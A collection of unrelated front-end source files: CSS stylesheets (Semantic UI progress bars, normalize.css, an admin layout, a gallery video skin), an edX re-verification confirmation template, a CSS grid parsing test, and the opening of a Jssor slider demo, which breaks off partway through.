background: #ffffff;
border-radius: 0.2857rem;
-webkit-animation: progress-active 2s ease infinite;
animation: progress-active 2s ease infinite;
}
@-webkit-keyframes progress-active {
0% {
opacity: 0.3;
width: 0;
}
100% {
opacity: 0;
width: 100%;
}
}
@keyframes progress-active {
0% {
opacity: 0.3;
width: 0;
}
100% {
opacity: 0;
width: 100%;
}
}
/*--------------
Disabled
---------------*/
.ui.disabled.progress {
opacity: 0.35;
}
.ui.disabled.progress .bar,
.ui.disabled.progress .bar::after {
-webkit-animation: none !important;
animation: none !important;
}
/*******************************
Variations
*******************************/
/*--------------
Inverted
---------------*/
.ui.inverted.progress {
background: rgba(255, 255, 255, 0.05);
border: none;
}
.ui.inverted.progress .bar {
background: #888888;
}
.ui.inverted.progress .bar > .progress {
color: #fafafa;
}
.ui.inverted.progress > .label {
color: #ffffff;
}
.ui.inverted.progress.success > .label {
color: #5bbd72;
}
.ui.inverted.progress.warning > .label {
color: #f2c037;
}
.ui.inverted.progress.error > .label {
color: #d95c5c;
}
/*--------------
Attached
---------------*/
/* bottom attached */
.ui.progress.attached {
background: transparent;
position: relative;
border: none;
margin: 0em;
}
.ui.progress.attached,
.ui.progress.attached .bar {
display: block;
height: 0.2rem;
padding: 0px;
overflow: hidden;
border-radius: 0em 0em 0.2857rem 0.2857rem;
}
.ui.progress.attached .bar {
border-radius: 0em;
}
/* top attached */
.ui.progress.top.attached,
.ui.progress.top.attached .bar {
top: 0px;
border-radius: 0.2857rem 0.2857rem 0em 0em;
}
.ui.progress.top.attached .bar {
border-radius: 0em;
}
/* Coupling */
.ui.segment > .ui.attached.progress,
.ui.card > .ui.attached.progress {
position: absolute;
top: auto;
left: 0;
bottom: 100%;
width: 100%;
}
.ui.segment > .ui.bottom.attached.progress,
.ui.card > .ui.bottom.attached.progress {
top: 100%;
bottom: auto;
}
/*--------------
Colors
---------------*/
.ui.black.progress .bar {
background-color: #1b1c1d;
}
.ui.blue.progress .bar {
background-color: #3b83c0;
}
.ui.green.progress .bar {
background-color: #5bbd72;
}
.ui.orange.progress .bar {
background-color: #e07b53;
}
.ui.pink.progress .bar {
background-color: #d9499a;
}
.ui.purple.progress .bar {
background-color: #564f8a;
}
.ui.red.progress .bar {
background-color: #d95c5c;
}
.ui.teal.progress .bar {
background-color: #00b5ad;
}
.ui.yellow.progress .bar {
background-color: #f2c61f;
}
.ui.black.inverted.progress .bar {
background-color: #333333;
}
.ui.blue.inverted.progress .bar {
background-color: #54c8ff;
}
.ui.green.inverted.progress .bar {
background-color: #2ecc40;
}
.ui.orange.inverted.progress .bar {
background-color: #ff851b;
}
.ui.pink.inverted.progress .bar {
background-color: #ff8edf;
}
.ui.purple.inverted.progress .bar {
background-color: #cdc6ff;
}
.ui.red.inverted.progress .bar {
background-color: #ff695e;
}
.ui.teal.inverted.progress .bar {
background-color: #6dffff;
}
.ui.yellow.inverted.progress .bar {
background-color: #ffe21f;
}
/*--------------
Sizes
---------------*/
.ui.tiny.progress {
font-size: 0.85714286rem;
}
.ui.tiny.progress .bar {
height: 0.5em;
}
.ui.small.progress {
font-size: 0.92857143rem;
}
.ui.small.progress .bar {
height: 1em;
}
.ui.progress {
font-size: 1rem;
}
.ui.progress .bar {
height: 1.75em;
}
.ui.large.progress {
font-size: 1.14285714rem;
}
.ui.large.progress .bar {
height: 2.5em;
}
.ui.big.progress {
font-size: 1.28571429rem;
}
.ui.big.progress .bar {
height: 3.5em;
}
/*******************************
Progress
*******************************/
/*******************************
Site Overrides
*******************************/
|
web/css/normalizar.css
|
raymercb/devsulabs
|
/*
,adPPYba, 88 88 8b,dPPYba, ,adPPYba, 8b,dPPYba,
a8" "" 88 88 88P' "8a a8" "8a 88P' `"8a
8b 88 88 88 d8 8b d8 88 88
"8a, ,aa "8a, ,a88 88b, ,a8" "8a, ,a8" 88 88
`"Ybbd8"' `"YbbdP'Y8 88`YbbdP"' `"YbbdP"' 88 88
88
88
-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-
Objetivo de esta hoja de estilos
--------------------------------------------------------------
Normaliza el estilo de todos los elementos HTML para que por
defecto se vean bien e igual en todos los navegadores.
Se aplica a
--------------------------------------------------------------
frontend, backend y extranet
Copiado de
--------------------------------------------------------------
https://github.com/necolas/normalize.css
*/
/* ===========================================================================
HTML5 display definitions
======================================================================== */
article, aside, details, figcaption, figure, footer, header, hgroup, nav, section { display: block; }
audio, canvas, video { display: inline-block; *display: inline; *zoom: 1; }
audio:not([controls]) { display: none; }
[hidden] { display: none; }
/* ===========================================================================
Base
======================================================================== */
/*
* 1. Correct text resizing oddly in IE6/7 when body font-size is set using em units
* 2. Force vertical scrollbar in non-IE
* 3. Prevent iOS text size adjust on device orientation change, without disabling user zoom: h5bp.com/g
*/
html { font-size: 100%; overflow-y: scroll; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; }
body { margin: 0; font-size: 13px; line-height: 1.231; }
body, button, input, select, textarea { font-family: sans-serif; color: #222; }
/*
* Remove text-shadow in selection highlight: h5bp.com/i
* These selection declarations have to be separate
* Also: hot pink! (or customize the background color to match your design)
*/
::-moz-selection { background: #fe57a1; color: #fff; text-shadow: none; }
::selection { background: #fe57a1; color: #fff; text-shadow: none; }
/* ===========================================================================
Links
======================================================================== */
a { color: #00e; }
a:visited { color: #551a8b; }
a:hover { color: #06e; }
a:focus { outline: thin dotted; }
/* Improve readability when focused and hovered in all browsers: h5bp.com/h */
a:hover, a:active { outline: 0; }
/* ===========================================================================
Typography
======================================================================== */
abbr[title] { border-bottom: 1px dotted; }
b, strong { font-weight: bold; }
blockquote { margin: 1em 40px; }
dfn { font-style: italic; }
hr { display: block; height: 1px; border: 0; border-top: 1px solid #ccc; margin: 1em 0; padding: 0; }
ins { background: #ff9; color: #000; text-decoration: none; }
mark { background: #ff0; color: #000; font-style: italic; font-weight: bold; }
/* Redeclare monospace font family: h5bp.com/j */
pre, code, kbd, samp { font-family: monospace, monospace; _font-family: 'courier new', monospace; font-size: 1em; }
/* Improve readability of pre-formatted text in all browsers */
pre { white-space: pre; white-space: pre-wrap; word-wrap: break-word; }
q { quotes: none; }
q:before, q:after { content: ""; content: none; }
small { font-size: 85%; }
/* Position subscript and superscript content without affecting line-height: h5bp.com/k */
sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; }
sup { top: -0.5em; }
sub { bottom: -0.25em; }
/* ===========================================================================
Lists
======================================================================== */
ul, ol { margin: 1em 0; padding: 0 0 0 40px; }
dd { margin: 0 0 0 40px; }
nav ul, nav ol { list-style: none; list-style-image: none; margin: 0; padding: 0; }
/* ===========================================================================
Embedded content
======================================================================== */
/*
* 1. Improve image quality when scaled in IE7: h5bp.com/d
* 2. Remove the gap between images and borders on image containers: h5bp.com/e
*/
img { border: 0; -ms-interpolation-mode: bicubic; vertical-align: middle; }
/*
* Correct overflow not hidden in IE9
*/
svg:not(:root) { overflow: hidden; }
/* ===========================================================================
Figures
======================================================================== */
figure { margin: 0; }
/* ===========================================================================
Forms
======================================================================== */
form { margin: 0; }
fieldset { border: 0; margin: 0; padding: 0; }
/* Indicate that 'label' will shift focus to the associated form element */
label { cursor: pointer; }
/*
* 1. Correct color not inheriting in IE6/7/8/9
* 2. Correct alignment displayed oddly in IE6/7
*/
legend { border: 0; *margin-left: -7px; padding: 0; }
/*
* 1. Correct font-size not inheriting in all browsers
* 2. Remove margins in FF3/4 S5 Chrome
* 3. Define consistent vertical alignment display in all browsers
*/
button, input, select, textarea { font-size: 100%; margin: 0; vertical-align: baseline; *vertical-align: middle; }
/*
* 1. Define line-height as normal to match FF3/4 (set using !important in the UA stylesheet)
* 2. Correct inner spacing displayed oddly in IE6/7
*/
button, input { line-height: normal; *overflow: visible; }
/*
* Reintroduce inner spacing in 'table' to avoid overlap and whitespace issues in IE6/7
*/
table button, table input { *overflow: auto; }
/*
* 1. Display hand cursor for clickable form elements
* 2. Allow styling of clickable form elements in iOS
*/
button, input[type="button"], input[type="reset"], input[type="submit"] { cursor: pointer; -webkit-appearance: button; }
/*
* Consistent box sizing and appearance
*/
input[type="checkbox"], input[type="radio"] { box-sizing: border-box; }
input[type="search"] { -webkit-appearance: textfield; -moz-box-sizing: content-box; -webkit-box-sizing: content-box; box-sizing: content-box; }
input[type="search"]::-webkit-search-decoration { -webkit-appearance: none; }
/*
* Remove inner padding and border in FF3/4: h5bp.com/l
*/
button::-moz-focus-inner, input::-moz-focus-inner { border: 0; padding: 0; }
/*
* 1. Remove default vertical scrollbar in IE6/7/8/9
* 2. Allow only vertical resizing
*/
textarea { overflow: auto; vertical-align: top; resize: vertical; }
/* Colors for form validity */
input:valid, textarea:valid { }
input:invalid, textarea:invalid { background-color: #f0dddd; }
/* ===========================================================================
Tables
======================================================================== */
table { border-collapse: collapse; border-spacing: 0; }
td { vertical-align: top; }
|
webapp/s/mossle/css/layout3.css
|
callmeyan/lemon
|
/* Essentials */
html, body {
height: 100%;
margin: 0;
padding: 0;
font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;
background: white;
font-size: 12px;
}
label, input, button, select, textarea {
font-size: 12px;
font-weight: normal;
line-height: 20px;
}
select, textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
font-size: 12px;
height: 16px;
line-height: 16px;
}
textarea {
height: auto;
}
select {
height: 26px;
}
a:link, a:visited {
color: #77BACE;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
fieldset {
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background: #F6F6F6;
border: 1px solid #ccc;
padding: 1% 0%;
margin: 10px 0;
}
fieldset label {
display: block;
float: left;
width: 200px;
height: 25px;
line-height: 25px;
text-shadow: 0 1px 0 #fff;
font-weight: bold;
padding-left: 10px;
margin: -5px 0 5px 0;
text-transform: uppercase;
font-size: 12px;
}
fieldset input[type=text] {
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
border: 1px solid #BBBBBB;
height: 20px;
color: #666666;
-webkit-box-shadow: inset 0 2px 2px #ccc, 0 1px 0 #fff;
-moz-box-shadow: inset 0 2px 2px #ccc, 0 1px 0 #fff;
box-shadow: inset 0 2px 2px #ccc, 0 1px 0 #fff;
padding-left: 10px;
background-position: 10px 6px;
margin: 0;
display: block;
float: left;
width: 96%;
margin: 0 10px;
}
fieldset input[type=text]:focus {
outline: none;
border: 1px solid #77BACE;
-webkit-box-shadow: inset 0 2px 2px #ccc, 0 0 10px #ADDCE6;
-moz-box-shadow: inset 0 2px 2px #ccc, 0 0 10px #ADDCE6;
box-shadow: inset 0 2px 2px #ccc, 0 0 10px #ADDCE6;
}
fieldset select {
width: 96%;
margin: 0 10px;
border: 1px solid #bbb;
height: 20px;
color: #666666;
}
fieldset textarea {
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
border: 1px solid #BBBBBB;
color: #666666;
-webkit-box-shadow: inset 0 2px 2px #ccc, 0 1px 0 #fff;
-moz-box-shadow: inset 0 2px 2px #ccc, 0 1px 0 #fff;
box-shadow: inset 0 2px 2px #ccc, 0 1px 0 #fff;
padding-left: 10px;
background-position: 10px 6px;
margin: 0 0.5%;
display: block;
float: left;
width: 96%;
margin: 0 10px;
}
fieldset textarea:focus {
outline: none;
border: 1px solid #77BACE;
-webkit-box-shadow: inset 0 2px 2px #ccc, 0 0 10px #ADDCE6;
-moz-box-shadow: inset 0 2px 2px #ccc, 0 0 10px #ADDCE6;
box-shadow: inset 0 2px 2px #ccc, 0 0 10px #ADDCE6;
}
.m-clear {
clear: both;
}
.m-spacer {
height: 20px;
}
/* header */
#m-header h3.title {
padding-left:20px;
line-height:20px;
}
#m-header h3.title a {
text-decoration: none;
color: black;
}
#m-header div.info {
padding-top:10px;
padding-right:20px;
}
#m-header div.info a {
margin-left:15px;
}
#m-header .navbar-inner {
border-radius:0px;
}
/* sidebar */
#m-sidebar .accordion-group {
margin-left: 10px;
border:1px solid #C2C2C3;
}
#m-sidebar .accordion-heading {
border-radius: 3px 3px 0px 0px;
background-color: #CCCCCC;
box-shadow: 0 1px 0 0 rgba(255, 255, 255, 0.5) inset;
background: linear-gradient(to bottom, #FAFAFA 0%, #EFEFEF 100%) repeat scroll 0 0 transparent;
text-shadow: 0 1px 0 #FFFFFF;
color: #333333;
}
#m-sidebar .accordion-heading .accordion-toggle {
display: block;
padding: 5px 15px;
}
#m-sidebar .title {
color:black;
font-size:14px;
font-weight: bold;
}
/* footer */
#m-footer hr {
margin-left: 10px;
}
/* main */
#m-main {
float: right;
padding-right: 10px;
}
/* widget */
.m-widget {
margin-top: 0px;
margin-bottom: 10px;
border-radius: 3px;
box-shadow: #E6E6E6 0px 1px 1px 0px;
}
.m-widget .header {
height: 20px;
padding: 5px 15px;
border:1px solid #C2C2C3;
padding-left: 10px;
border-radius: 3px 3px 0px 0px;
background-color: #CCCCCC;
box-shadow: 0 1px 0 0 rgba(255, 255, 255, 0.5) inset;
background: linear-gradient(to bottom, #FAFAFA 0%, #EFEFEF 100%) repeat scroll 0 0 transparent;
text-shadow: 0 1px 0 #FFFFFF;
color: #333333;
}
.m-widget .header .title {
float: left;
margin: 0px;
font-size:14px;
}
.m-widget .header .ctrl {
float: right;
}
.m-widget .header .ctrl .btn {
margin: 0px;
padding-left: 3px;
padding-right: 3px;
padding-top: 0px;
padding-bottom: 0px;
}
.m-widget .content {
border-left: 1px solid #C2C2C3;
border-right: 1px solid #C2C2C3;
border-bottom: 1px solid #C2C2C3;
border-radius: 0px 0px 3px 3px;
}
.m-widget .content.content-inner {
padding-left: 10px;
padding-top:10px;
font-size: 12px;
}
.m-widget .content .table {
margin-bottom: 0px;
}
/* page */
.m-page-size {
margin-bottom:0px;
width:55px;
display:inline;
}
/* Main Table */
.m-table {
width: 100%;
margin: -5px 0 0 0;
line-height: 16px;
}
.m-table td {
margin: 0;
padding: 0;
border-bottom: 1px dotted #ccc;
}
.m-table thead tr {
height: 20px;
background: url(../img/table_sorter_header.png) repeat-x;
text-align: left;
text-indent: 10px;
cursor: pointer;
}
.m-table td {
padding: 4px 10px;
}
.m-table input[type=image] {
margin-right: 10px;
}
.m-table input[type=checkbox] {
margin: 3px 3px 3px 4px;
}
.m-table th.sorting {
background: no-repeat url(../img/sorting.png);
background-position: right -52px;
cursor: pointer;
}
.m-table th.sorting-asc {
background-position: right -2px;
}
.m-table th.sorting-desc {
background-position: right -29px;
}
/* etc */
.m-form-blank {
margin: 0px;
}
.m-form-bottom {
margin-bottom: 10px;
}
.m-table-check {
text-indent: 0px;
text-align: center;
}
.m-blank {
margin-bottom: 10px;
}
.form-inline .chzn-container {
vertical-align: middle;
}
/* Alerts */
div.m-alert-info {
display: block;
width: 95%;
margin: 10px 3% 0 3%;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background: #B5E5EF url(../img/icn_alert_info.png) no-repeat;
background-position: 10px 10px;
border: 1px solid #77BACE;
color: #082B33;
padding: 10px 0;
text-indent: 40px;
font-size: 14px;
}
div.m-alert-warning {
display: block;
width: 95%;
margin: 10px 3% 0 3%;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background: #F5F3BA url(../img/icn_alert_warning.png) no-repeat;
background-position: 10px 10px;
border: 1px solid #C7A20D;
color: #796616;
padding: 10px 0;
text-indent: 40px;
font-size: 14px;
}
div.m-alert-error {
display: block;
width: 95%;
margin: 10px 3% 0 3%;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background: #F3D9D9 url(../img/icn_alert_error.png) no-repeat;
background-position: 10px 10px;
border: 1px solid #D20009;
color: #7B040F;
padding: 10px 0;
text-indent: 40px;
font-size: 14px;
}
div.m-alert-success {
display: block;
width: 95%;
margin: 10px 3% 0 3%;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background: #E2F6C5 url(../img/icn_alert_success.png) no-repeat;
background-position: 10px 10px;
border: 1px solid #79C20D;
color: #32510F;
padding: 10px 0;
text-indent: 40px;
font-size: 14px;
}
/**
* bootstrap modal
*/
.modal {
top: 50%;
}
.modal-backdrop, .modal-backdrop.fade.in {
opacity: 0.2;
filter: alpha(opacity=20);
}
/**
* uniform
* 美化中文下的字体大小
*/
div.uploader span.filename {
font-size: 12px;
}
div.uploader span.action {
font-size: 12px;
}
/**
* boostrap里的配置会导致radio样式下包裹的radio样式margin-left:-20px;
* 导致被uniform渲染后的radio会跑到显示的radio的左边,无法点击到
* 这里设置为0px,让用户可以简单点击到
*/
.radio input[type="radio"],
.checkbox input[type="checkbox"] {
float: left;
margin-left: 0px;
}
/**
* uniform里用的是checker,要和bootstrap里保持一致
*/
.radio.inline + .radio.inline,
.checkbox.inline + .checkbox.inline,
.checker.inline + .checker.inline {
margin-left: 10px;
}
/**
* uniform里checkbox的margin-right是5px,radio的margin-right是3px
* 为了避免上下不对齐,统一改成5px
*/
div.radio {
margin-right: 5px;
}
/**
* 输入框背景显示标尺
*/
input.measure-input {
background: url("../img/ruler.gif") repeat-x scroll 0 9px transparent;
border-color: #AAAAAA #CCCCCC #CCCCCC #AAAAAA;
border-radius: 3px 3px 3px 3px;
border-style: solid;
border-width: 1px;
color: #777777;
font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;
font-size: 12px;
font-weight: normal;
outline: 0 none;
padding-bottom: 3px;
}
.navbar-inverse .navbar-search .search-query {
border-radius: 15px 15px 15px 15px;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
font-size: 13px;
font-weight: 400;
line-height: 1;
margin-bottom: 0;
height: 20px;
background: none repeat scroll 0 0 rgba(35, 43, 48, 0.83);
border-color: #111111;
box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1) inset, 0 1px 0 rgba(255, 255, 255, 0.15);
color: gray;
transition: none 0s ease 0s;
}
.navbar-inverse .navbar-search .search-query:focus {
transition: width 0.3s ease 0s;
width: 100px;
background: white;
}
.navbar-inverse .navbar-search i {
position: absolute;
right: 10px;
top: 5px;
}
/**
* chozen中single select的search input高度过小的问题
*/
.chzn-search input[type="text"] {
height: 24px;
}
|
lms/templates/verify_student/reverification_confirmation.html
|
olexiim/edx-platform
|
<%! from django.utils.translation import ugettext as _ %>
<%! from django.core.urlresolvers import reverse %>
<%inherit file="../main.html" />
<%namespace name='static' file='/static_content.html'/>
<%block name="bodyclass">register verification-process is-not-verified step-confirmation</%block>
<%block name="pagetitle">${_("Re-Verification Submission Confirmation")}</%block>
<%block name="js_extra">
<script src="${static.url('js/vendor/responsive-carousel/responsive-carousel.js')}"></script>
<script src="${static.url('js/vendor/responsive-carousel/responsive-carousel.keybd.js')}"></script>
</%block>
<%block name="content">
<div class="container">
<section class="wrapper">
<div class="wrapper-progress">
<section class="progress">
<h3 class="sr title">${_("Your Progress")}</h3>
<ol class="progress-steps">
<li class="progress-step is-completed" id="progress-step1">
<span class="wrapper-step-number"><span class="step-number">1</span></span>
<span class="step-name">${_("Re-Take Photo")}</span>
</li>
<li class="progress-step is-completed" id="progress-step2">
<span class="wrapper-step-number"><span class="step-number">2</span></span>
<span class="step-name">${_("Re-Take ID Photo")}</span>
</li>
<li class="progress-step is-completed" id="progress-step3">
<span class="wrapper-step-number"><span class="step-number">3</span></span>
<span class="step-name">${_("Review")}</span>
</li>
<li class="progress-step is-current progress-step-icon" id="progress-step4">
<span class="wrapper-step-number"><span class="step-number">
<i class="icon fa fa-check-square-o"></i>
</span></span>
<span class="step-name"><span class="sr">${_("Current Step: ")}</span>${_("Confirmation")}</span>
</li>
</ol>
<span class="progress-sts">
<span class="progress-sts-value"></span>
</span>
</section>
</div>
<div class="wrapper-content-main">
<article class="content-main">
<section class="content-confirmation">
<div class="wrapper-view">
<div class="view">
<h3 class="title">${_("Your Credentials Have Been Updated")}</h3>
<div class="instruction">
<p>${_("We've captured your re-submitted information and will review it to verify your identity shortly. You should receive an update to your veriication status within 1-2 days. In the meantime, you still have access to all of your course content.")}</p>
</div>
<ol class="list-nav">
<li class="nav-item">
<a class="action action-primary" href="${reverse('dashboard')}">${_("Return to Your Dashboard")}</a>
</li>
</ol>
</div> <!-- /view -->
</div> <!-- /wrapper-view -->
</section>
</article>
</div> <!-- /wrapper-content-main -->
<%include file="_reverification_support.html" />
</section>
</div>
</%block>
|
wp-content/plugins/unitegallery/unitegallery-plugin/themes/video/skin-right-title-only.css
|
silverboxdev/shottsyarts.com
|
@CHARSET "ISO-8859-1";
/* ----- Strip Panel ------- */
.ug-videoskin-right-title-only .ug-strip-panel{
background-color:#232323;
}
/* ----- Thumb Wrapper ------- */
.ug-videoskin-right-title-only .ug-thumb-wrapper{
background-color:#232323;
border-bottom:1px solid #393939;
width:360px;
height:60px;
cursor:pointer;
text-align:left;
}
.ug-videoskin-right-title-only .ug-thumb-wrapper:last-child{
border-bottom:none;
}
/* - thumb selected and over - */
.ug-videoskin-right-title-only .ug-thumb-wrapper.ug-thumb-over{
cursor:pointer;
background-color:#1A1A1A;
}
.ug-videoskin-right-title-only .ug-thumb-wrapper.ug-thumb-selected{
cursor:default;
background-color:#176DB3;
}
/* ----- Thumb Inner data ------- */
.ug-videoskin-right-title-only .ug-thumb-inner{
padding-top:18px;
padding-left:20px;
padding-right:10px;
}
.ug-videoskin-right-title-only .ug-thumb-title{
color:white;
font-size:14px;
}
/* ----- Buttons Panel ------- */
.ug-videoskin-right-title-only .ug-video-buttons-panel{
height:42px;
background-color:#000;
position:absolute;
display:none;
}
.ug-videoskin-right-title-only .ug-button-prev-video{
width:50%;
height:42px;
float:left;
background-image:url('images/arrow_left.png');
cursor:pointer;
background-repeat:no-repeat;
background-position:center;
box-sizing:border-box;
border-right:1px solid #444;
}
.ug-videoskin-right-title-only .ug-button-prev-video:hover, .ug-videoskin-right-title-only .ug-button-next-video:hover
{
background-color:#444;
}
.ug-videoskin-right-title-only .ug-button-next-video{
width:50%;
height:42px;
float:right;
background-image:url('images/arrow_right.png');
cursor:pointer;
background-repeat:no-repeat;
background-position:center;
}
/* ----- Under 960 ------- */
.ug-under-960.ug-videoskin-right-title-only .ug-thumb-wrapper
{
width:300px;
}
.ug-under-960.ug-videoskin-right-title-only .ug-thumb-title {
width: 289px;
height:18px;
font-size:14px;
}
.ug-under-960.ug-videoskin-right-title-only .ug-video-buttons-panel{
display:none;
}
/* ----- Under 780 ------- */
.ug-under-780.ug-videoskin-right-title-only .ug-thumb-wrapper
{
width:240px;
}
.ug-under-780.ug-videoskin-right-title-only .ug-thumb-icon
{
width:40px;
}
.ug-under-780.ug-videoskin-right-title-only .ug-thumb-title {
width: 167px;
height:18px;
font-size:14px;
}
.ug-under-780.ug-videoskin-right-title-only .ug-video-buttons-panel{
display:none;
}
/* ----- Under 480 ------- */
.ug-under-480.ug-videoskin-right-title-only .ug-thumb-wrapper
{
width:0px;
}
.ug-under-480.ug-videoskin-right-title-only .ug-thumb-title {
display:none;
}
.ug-under-480.ug-videoskin-right-title-only .ug-thumb-inner {
padding-left: 8px;
padding-right: 5px;
padding-top: 12px;
}
.ug-under-480.ug-videoskin-right-title-only .ug-thumb-icon
{
width:40px;
}
.ug-under-480.ug-videoskin-right-title-only .ug-video-buttons-panel{
display:block;
}
|
third_party/blink/web_tests/external/wpt/css/css-grid/parsing/grid-area-valid.html
|
scheib/chromium
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>CSS Grid Layout Test: parsing grid-area with valid values</title>
<link rel="author" title="Eric Willigers" href="mailto:ericwilligers@chromium.org">
<link rel="help" href="https://drafts.csswg.org/css-grid-1/#propdef-grid-area">
<meta name="assert" content="grid-area supports the full grammar '<grid-line> [ / <grid-line> ]{0,3}'.">
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<script src="/css/support/parsing-testcommon.js"></script>
</head>
<body>
<script>
// auto
test_valid_value("grid-area", "auto");
test_valid_value("grid-area", "auto / auto", "auto");
test_valid_value("grid-area", "auto / auto / auto", "auto");
test_valid_value("grid-area", "auto / auto / auto / auto", "auto");
test_valid_value("grid-area", "AuTo", "auto");
test_valid_value("grid-row", "auto");
test_valid_value("grid-row", "auto/auto", "auto");
test_valid_value("grid-column-end", "AuTo", "auto");
// <custom-ident>
test_valid_value("grid-area", "--a");
test_valid_value("grid-row", "-zπ");
test_valid_value("grid-row", "-zπ/-zπ", "-zπ");
test_valid_value("grid-row", "i / i", "i");
test_valid_value("grid-row-start", "AZ");
test_valid_value("grid-column-start", "-_π");
test_valid_value("grid-row-end", "_9");
// <integer> && <custom-ident>?
test_valid_value("grid-area", "1");
test_valid_value("grid-area", "+90 -a-", "90 -a-");
test_valid_value("grid-row", "az 2", "2 az");
test_valid_value("grid-column", "9");
test_valid_value("grid-column", "-19 zA");
test_valid_value("grid-column", "-A0 33", "33 -A0");
test_valid_value("grid-row-start", "-19");
test_valid_value("grid-row-start", "9 -Z_");
test_valid_value("grid-column-start", "+90", "90");
test_valid_value("grid-column-start", "Z -44", "-44 Z");
test_valid_value("grid-row-end", "1 -πA");
test_valid_value("grid-column-end", "π_ +5", "5 π_");
// span && [ <integer> || <custom-ident> ]
test_valid_value("grid-area", "span 2 i");
test_valid_value("grid-area", "i 2 SpAn", "span 2 i");
test_valid_value("grid-row", "span 2");
test_valid_value("grid-column", "i SpAn", "span i");
test_valid_value("grid-row-start", "span i");
test_valid_value("grid-column-start", "SpAn i 2", "span 2 i");
test_valid_value("grid-row-end", "2 i span", "span 2 i");
test_valid_value("grid-column-end", "2 SpAn", "span 2");
// <grid-line> [ / <grid-line> ]{0,3}
test_valid_value("grid-area", "auto / i");
test_valid_value("grid-area", "auto / i / auto / i", "auto / i");
test_valid_value("grid-area", "auto / i / auto / 2 i");
test_valid_value("grid-area", "1 / i / auto / i", "1 / i");
test_valid_value("grid-area", "1 / auto / auto / auto", "1");
test_valid_value("grid-area", "1 / auto / i / auto", "1 / auto / i");
test_valid_value("grid-area", "1 / j / i / k");
test_valid_value("grid-area", "1 / auto / 2 / auto", "1 / auto / 2");
test_valid_value("grid-area", "1 / i / 2 / auto");
test_valid_value("grid-area", "i / i / auto / auto");
test_valid_value("grid-area", "i / auto / i / auto", "i / auto");
test_valid_value("grid-area", "auto / i / 2 j");
test_valid_value("grid-area", "auto / i / 2 j / span 3 k");
test_valid_value("grid-row", "auto / i");
test_valid_value("grid-row", "i / auto");
test_valid_value("grid-row", "2 i / auto", "2 i");
test_valid_value("grid-row", "1 / auto", "1");
test_valid_value("grid-column", "2 j / span 3 k");
// https://github.com/w3c/csswg-drafts/issues/2858
// '\\31 st' in Blink, Firefox, EdgeHTML and Safari serialize invalid values.
test_valid_value("grid-column-end", "\\31st", ["\\31 st", "\\31st"]);
test_valid_value("grid-column-end", "\\31 st", ["\\31 st", "\\31st"]);
test_valid_value("grid-column", "\\31st / \\31 st", ["\\31 st", "\\31st"]);
</script>
</body>
</html>
|
src/Wzc/MainBundle/Resources/public/JssorSlider/demos-no-jquery/scrolling-logo-thumbnail-slider.source.html
|
bhdm/wzc
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Scrolling Logo/Thumbnail Slider Demo - Jssor Slider, Carousel, Slideshow with Javascript Source Code</title>
</head>
<body style="font-family:Arial, Verdana;background-color:#fff;">
<!-- use jssor.slider.min.js instead for release -->
<!-- jssor.slider.min.js = (jssor.js + jssor.slider.js) -->
<script type="text/javascript" src="../js/jssor.js"></script>
<script type="text/javascript" src="../js/jssor.slider.js"></script>
<script>
jssor_slider1_starter = function (containerId) {
var options = {
$AutoPlay: true, //[Optional] Whether to auto play, to enable slideshow, this option must be set to true, default value is false
$AutoPlaySteps: 1, //[Optional] Steps to go for each navigation request (this options applys only when slideshow disabled), the default value is 1
$AutoPlayInterval: 0, //[Optional] Interval (in milliseconds) to go for next slide since the previous stopped if the slider is auto playing, default value is 3000
$PauseOnHover: 4, //[Optional] Whether to pause when mouse over if a slider is auto playing, 0 no pause, 1 pause for desktop, 2 pause for touch device, 3 pause for desktop and touch device, 4 freeze for desktop, 8 freeze for touch device, 12 freeze for desktop and touch device, default value is 1
$ArrowKeyNavigation: true, //[Optional] Allows keyboard (arrow key) navigation or not, default value is false
$SlideEasing: $JssorEasing$.$EaseLinear, //[Optional] Specifies easing for right to left animation, default value is $JssorEasing$.$EaseOutQuad
$SlideDuration: 1600, //[Optional] Specifies default duration (swipe) for slide in milliseconds, default value is 500
$MinDragOffsetToSlide: 20, //[Optional] Minimum drag offset to trigger slide , default value is 20
$SlideWidth: 140, //[Optional] Width of every slide in pixels, default value is width of 'slides' container
//$SlideHeight: 100, //[Optional] Height of every slide in pixels, default value is height of 'slides' container
$SlideSpacing: 0, //[Optional] Space between each slide in pixels, default value is 0
$DisplayPieces: 7, //[Optional] Number of pieces to display (the slideshow would be disabled if the value is set to greater than 1), the default value is 1
$ParkingPosition: 0, //[Optional] The offset position to park slide (this options applys only when slideshow disabled), default value is 0.
$UISearchMode: 1, //[Optional] The way (0 parellel, 1 recursive, default value is 1) to search UI components (slides container, loading screen, navigator container, arrow navigator container, thumbnail navigator container etc).
$PlayOrientation: 1, //[Optional] Orientation to play slide (for auto play, navigation), 1 horizental, 2 vertical, 5 horizental reverse, 6 vertical reverse, default value is 1
$DragOrientation: 1 //[Optional] Orientation to drag slide, 0 no drag, 1 horizental, 2 vertical, 3 either, default value is 1 (Note that the $DragOrientation should be the same as $PlayOrientation when $DisplayPieces is greater than 1, or parking position is not 0)
};
